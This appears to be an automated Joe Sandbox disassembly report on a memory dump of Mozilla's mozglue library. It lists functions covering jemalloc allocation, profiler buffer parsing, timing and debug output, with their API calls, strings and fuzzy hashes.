Instruction Fuzzy Hash: BEA2AD71A1AB018FD704CF28C540715BBE1BB86728F29CA6DE869DFB91C771E841CB81

Function 6C9BC4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9BC5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9BC6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C9BC74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C9BC7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6C9BC9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9BCC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C9BCD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9BDB40
memcpy.VCRUNTIME140(?,?,?), ref: 6C9BDB62
memcpy.VCRUNTIME140(?,?,?), ref: 6C9BDB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9BDD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C9BDE95
memcpy.VCRUNTIME140(?,?,?), ref: 6C9BE360
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9BE432
memcpy.VCRUNTIME140(?,?,?), ref: 6C9BE472

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: e1c3f81d231211ef9dee21fb1a5de1049b4568e871490516a1836c365754f4bf
Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: 82339D72E0021ADFCB04CFA8C8806AEBBB6FF49314F284269D955BB755D731E945CB90

Function 6C96FD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C9DE7B8), ref: 6C96FF81
LeaveCriticalSection.KERNEL32(6C9DE7B8), ref: 6C97022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C970240
EnterCriticalSection.KERNEL32(6C9DE768), ref: 6C97025B
LeaveCriticalSection.KERNEL32(6C9DE768), ref: 6C97027B

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C970D67, 6C970D7B, 6C970DAC
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C96FE99, 6C96FEB7, 6C96FED3, 6C970DB8, 6C970DD3, 6C9719B4
<jemalloc>, xrefs: 6C970D62, 6C970D76, 6C970DA7

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3577267516
Opcode ID: 2a80efdd87dc380fcc29ea9a24c41a4f325f1e35b36375088548913f704783e7
Instruction ID: 89b0767db9b6ade71c2dd4f675689d8a6305506a27724497a8988b0c8490be09
Opcode Fuzzy Hash: 2a80efdd87dc380fcc29ea9a24c41a4f325f1e35b36375088548913f704783e7
Instruction Fuzzy Hash: 07C2F271A06B418FD724CF28C490716BBE1BF86728F28C66DE4698B7D5D732E841CB91

Function 6C9BE680 Relevance: 31.1, APIs: 22, Instructions: 3648COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00004014), ref: 6C9BE811
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9BEAA8
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C9BEBD5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9BEEF6
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9BF223
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C9BF322
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9C0E03
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C9C0E54
memcpy.VCRUNTIME140(?,?,?), ref: 6C9C0EAE
memcpy.VCRUNTIME140(?,?,?), ref: 6C9C0ED4

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: ceae3f136b220e6e16fa1b655adfe36be61ae5e1400f8ef16e74b717ab6da985
Instruction ID: a5d567ef99268a4b7d045aa9c7510be3e1a83ce64898b96b8b2d8d6408922307
Opcode Fuzzy Hash: ceae3f136b220e6e16fa1b655adfe36be61ae5e1400f8ef16e74b717ab6da985
Instruction Fuzzy Hash: 2A639D75E0025ACFCB04CFA8C8906ADFBB2FF89314F298269D855BB745D730A945CB91

Function 6C993E50 Relevance: 27.0, APIs: 13, Strings: 2, Instructions: 765COMMON

Download Yara Rule

APIs

Part of subcall function 6C9B7770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C993E7D,?,?,?,6C993E7D,?,?), ref: 6C9B777C

tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C993F17
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C993F5C
VerSetConditionMask.NTDLL ref: 6C993F8D
VerSetConditionMask.NTDLL ref: 6C993F99
VerSetConditionMask.NTDLL ref: 6C993FA0
VerSetConditionMask.NTDLL ref: 6C993FA7
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C993FB4

Strings

nvinit.dll, xrefs: 6C994479
nvd3d9wrap.dll, xrefs: 6C994466

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
String ID: nvd3d9wrap.dll$nvinit.dll
API String ID: 1189858803-2380496106
Opcode ID: b65f8d6034d8fa858a843ad24768d80be4915e4480e4909ca1764f7a21c0d320
Instruction ID: f37a4a6004366b2d173098e3670fc2ce9cfb69bed96d9c59383d1ec0d5faff55
Opcode Fuzzy Hash: b65f8d6034d8fa858a843ad24768d80be4915e4480e4909ca1764f7a21c0d320
Instruction Fuzzy Hash: BB52F471610B849FE715DF34C890AABB7F9AF65204F14092DE4978BB82DB34F909CB60

Function 6C97ED10 Relevance: 25.4, APIs: 16, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C97EE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C97EFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C981695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9816B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C981770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C981A3E

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID:
API String ID: 3693777188-0
Opcode ID: 6e4d2a8ffac268e9293e11b2aa4df37c6a649eea5850cf2a045991f55a915269
Instruction ID: 4b12cf259d144afaaa2cd7cea373ec058412700b17f052388d39559a68429258
Opcode Fuzzy Hash: 6e4d2a8ffac268e9293e11b2aa4df37c6a649eea5850cf2a045991f55a915269
Instruction Fuzzy Hash: 38B31A71E0521ACFCB24CFA8C890AADB7B2BF49304F2585A9D459BB745D730AD85CF90

Function 6C96FEF0 Relevance: 23.8, APIs: 13, Strings: 2, Instructions: 1294memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C9DE7B8), ref: 6C96FF81
LeaveCriticalSection.KERNEL32(6C9DE7B8), ref: 6C97022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C970240
EnterCriticalSection.KERNEL32(6C9DE768), ref: 6C97025B
LeaveCriticalSection.KERNEL32(6C9DE768), ref: 6C97027B

Strings

MOZ_CRASH(), xrefs: 6C970CA7
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C96FE99, 6C96FEB7, 6C96FED3, 6C970DB8, 6C970DD3, 6C9719B4, 6C971A10

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3566792288
Opcode ID: 0d97139f2cb002bf771881970588ce42eb97918fcba4bed82a808365ab3ded38
Instruction ID: 9e04d2b8b17a31effdaa4c5986ea67380293e502026a49a2b90f09ccd7402db7
Opcode Fuzzy Hash: 0d97139f2cb002bf771881970588ce42eb97918fcba4bed82a808365ab3ded38
Instruction Fuzzy Hash: AAB2CF716067418FD728CF28C590716BBE5BF86328F28C66CE86A8FB95D771E840CB51

Function 6C9A5600 Relevance: 22.0, APIs: 6, Strings: 6, Instructions: 950COMMON

Download Yara Rule

Strings

ProfileBuffer parse error: %s, xrefs: 6C9A5AC8, 6C9A5CBB
name, xrefs: 6C9A5E79, 6C9A5E8F
expected a Time entry, xrefs: 6C9A5CB6
data, xrefs: 6C9A6131
expected a Count entry, xrefs: 6C9A5AC3
schema, xrefs: 6C9A606D

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID:
String ID: ProfileBuffer parse error: %s$data$expected a Count entry$expected a Time entry$name$schema
API String ID: 0-2712937348
Opcode ID: 2e360f46ec059b5dd5a7d563aa2015b2633d5d2b0810dc7bf81ba7ac7f161efd
Instruction ID: 1c234d7b220db69f3c01c844945cfec444ea8526abe87858f7bb1cec0a8cb3ad
Opcode Fuzzy Hash: 2e360f46ec059b5dd5a7d563aa2015b2633d5d2b0810dc7bf81ba7ac7f161efd
Instruction Fuzzy Hash: 62927DB1A087418FD724CF68C49079ABBF1BFD9308F15891DE5999B751DB30E80ACB92

Function 6C9A2E4E Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 579stringCOMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C9A2ED3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9A2EE7
MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6C9A2F0D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9A3214
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C9A3242
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9A36BF

Strings

MOZ_PROFILER_SYMBOLICATE, xrefs: 6C9A378D
set , xrefs: 6C9A36EC
get , xrefs: 6C9A3205

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: strlen$AddressCode$DescribeDetailsFormat
String ID: MOZ_PROFILER_SYMBOLICATE$get $set
API String ID: 2257098003-3318126862
Opcode ID: 364a68ad7792d335fdae24e2818bc9704d714a5b4eb44bd79789ce217e76ec25
Instruction ID: fcf7d2da83b91621df7f831611866f776a009c8b83a0516a2479a48f3dd55743
Opcode Fuzzy Hash: 364a68ad7792d335fdae24e2818bc9704d714a5b4eb44bd79789ce217e76ec25
Instruction Fuzzy Hash: E1326AB02083818FD724CF64C4906AFBBE6BFD9318F55881DE99987751DB30E94ACB52

Function 6C997E10 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 403COMMON

Download Yara Rule

Strings

name, xrefs: 6C997ECF, 6C998335
data, xrefs: 6C998280, 6C9983E1
(pre-xul), xrefs: 6C997E88
schema, xrefs: 6C9981E3, 6C998311

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema
API String ID: 3412268980-999448898
Opcode ID: 6572f3929ea073ac104ff04011f7ddd70ed89a0fa90bc38913d72bae2fc50da6
Instruction ID: 0096d35f1d6d22ef1c4ed2c2cd64896e77ab5ea3b4a8f3be6cbd99faca9c9ffa
Opcode Fuzzy Hash: 6572f3929ea073ac104ff04011f7ddd70ed89a0fa90bc38913d72bae2fc50da6
Instruction Fuzzy Hash: 20E170B2B043408BD710CF69C84065BF7E9BFA5318F158A2DE895E7790DB74ED098B92

Function 6C97D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C9DE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C98D1C5), ref: 6C97D4F2
LeaveCriticalSection.KERNEL32(6C9DE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C98D1C5), ref: 6C97D50B

Part of subcall function 6C95CFE0: EnterCriticalSection.KERNEL32(6C9DE784), ref: 6C95CFF6
Part of subcall function 6C95CFE0: LeaveCriticalSection.KERNEL32(6C9DE784), ref: 6C95D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C98D1C5), ref: 6C97D52E
EnterCriticalSection.KERNEL32(6C9DE7DC), ref: 6C97D690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C97D6A6
LeaveCriticalSection.KERNEL32(6C9DE7DC), ref: 6C97D712
LeaveCriticalSection.KERNEL32(6C9DE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C98D1C5), ref: 6C97D751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C97D7EA

Strings

: (malloc) Error initializing arena, xrefs: 6C97D82C
<jemalloc>, xrefs: 6C97D827

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: 41305b2513f79e492f4842422e9104eed8a1279c18f99809987cbaac6d8d1bc1
Instruction ID: 96a4a64752f230c60a89d5c8778f51b7235316e20478d82bbd114c534b5f7bec
Opcode Fuzzy Hash: 41305b2513f79e492f4842422e9104eed8a1279c18f99809987cbaac6d8d1bc1
Instruction Fuzzy Hash: C791E7B2A09B018FD764CF28C49032AB7F5FB89714F25892ED55AD7B80D730E840CBA1

Function 6C975E90 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 2651COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(-0000000C), ref: 6C975EDB
memset.VCRUNTIME140(6C9B7765,000000E5,55CCCCCC), ref: 6C975F27
LeaveCriticalSection.KERNEL32(?), ref: 6C975FB2
memset.VCRUNTIME140(6C9B7765,000000E5,9DC09015), ref: 6C9761F0
VirtualFree.KERNEL32(-00000001,00100000,00004000), ref: 6C977652

Strings

MOZ_CRASH(), xrefs: 6C977BA4
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C97730D
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C9772E3
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C9772F8
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C977BCD, 6C977C1F, 6C977C34, 6C9780FD

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSectionmemset$EnterFreeLeaveVirtual
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 2613674957-1127040744
Opcode ID: d8b9ac9602b90d6c3e0967a2fcabd005328b0689fa97e4d35edf1f6c90cb50d3
Instruction ID: 996fe5998ea9a9b1bee0d5018e925c198fdc4bebaa0f5af7f8f36df48f15f03a
Opcode Fuzzy Hash: d8b9ac9602b90d6c3e0967a2fcabd005328b0689fa97e4d35edf1f6c90cb50d3
Instruction Fuzzy Hash: 6533AB716067018FC329CF28C590715BBE2FF85328F29C6ADE9698B7A5D731E841CB61

Function 6C953480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C953284,?,?,6C9756F6), ref: 6C953492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C953284,?,?,6C9756F6), ref: 6C9534A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C953284,?,?,6C9756F6), ref: 6C9534EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C95350E
__Init_thread_footer.LIBCMT ref: 6C953522
__aulldiv.LIBCMT ref: 6C953552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C953284,?,?,6C9756F6), ref: 6C95357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C953284,?,?,6C9756F6), ref: 6C953592

Part of subcall function 6C98AB89: EnterCriticalSection.KERNEL32(6C9DE370,?,?,?,6C9534DE,6C9DF6CC,?,?,?,?,?,?,?,6C953284), ref: 6C98AB94
Part of subcall function 6C98AB89: LeaveCriticalSection.KERNEL32(6C9DE370,?,6C9534DE,6C9DF6CC,?,?,?,?,?,?,?,6C953284,?,?,6C9756F6), ref: 6C98ABD1

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6C953508
kernel32.dll, xrefs: 6C9534EA

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: b385b3109936ec8d300f9b69de9ce1e5e88c6ccf69e48cb1de9a109dd2ddc2e1
Instruction ID: 46b725374db4dc12397a2a0e70679316c52db21473d490fd20276b4f68640038
Opcode Fuzzy Hash: b385b3109936ec8d300f9b69de9ce1e5e88c6ccf69e48cb1de9a109dd2ddc2e1
Instruction Fuzzy Hash: 7731D371B0590A9BDF00DFB9C849AAE77B9FB86309F60441AF505B3A50DB30FA45CB60

Function 6C9B4EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6C9B4EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B4F2E
moz_xmalloc.MOZGLUE ref: 6C9B4F52
memset.VCRUNTIME140(00000000,00000000), ref: 6C9B4F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B52B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B52E6
Sleep.KERNEL32(00000010), ref: 6C9B5481
free.MOZGLUE(?), ref: 6C9B5498

Strings

(, xrefs: 6C9B5250

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: 888efca545e98b68fbd3cfb3199a3da6d2c812220a00c7fb7fb60e897497c186
Instruction ID: e5d49cdbbb5d04a2e944e2b95479d29b7a345e8b047c2374482d56ad5b66e37a
Opcode Fuzzy Hash: 888efca545e98b68fbd3cfb3199a3da6d2c812220a00c7fb7fb60e897497c186
Instruction Fuzzy Hash: 09F1B171A18F408FC716CF39C85162BB7F9AFE6284F158B2EF846A7651DB31D4428B81

Function 6C967810 Relevance: 15.4, APIs: 12, Instructions: 372COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C9DE744), ref: 6C967885
LeaveCriticalSection.KERNEL32(6C9DE744), ref: 6C9678A5
EnterCriticalSection.KERNEL32(6C9DE784), ref: 6C9678AD
LeaveCriticalSection.KERNEL32(6C9DE784), ref: 6C9678CD
EnterCriticalSection.KERNEL32(6C9DE7DC), ref: 6C9678D4
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C9678E9
EnterCriticalSection.KERNEL32(00000000), ref: 6C96795D
memset.VCRUNTIME140(?,00000000,00000160), ref: 6C9679BB
LeaveCriticalSection.KERNEL32(?), ref: 6C967BBC
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C967C82
LeaveCriticalSection.KERNEL32(6C9DE7DC), ref: 6C967CD2
memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C967DAF

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavememset
String ID:
API String ID: 759993129-0
Opcode ID: 3cd571f76ea9f0da3a756c70637abea9dd2daa8b7411d8d659cfe678d2372082
Instruction ID: ecca295668190f666a14f864ffc2310ca795c118f821cf80c2765144a7e92b00
Opcode Fuzzy Hash: 3cd571f76ea9f0da3a756c70637abea9dd2daa8b7411d8d659cfe678d2372082
Instruction Fuzzy Hash: 8B027371A0561A8FEB54CF19C984799B7B5FF48318F2582AAD809A7B41D734FE90CF80

Function 6C9B5FF0 Relevance: 15.1, APIs: 10, Instructions: 76COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6C9B6009
??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C9B6024
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6C95EE51,?), ref: 6C9B6046
OutputDebugStringA.KERNEL32(?,6C95EE51,?), ref: 6C9B6061
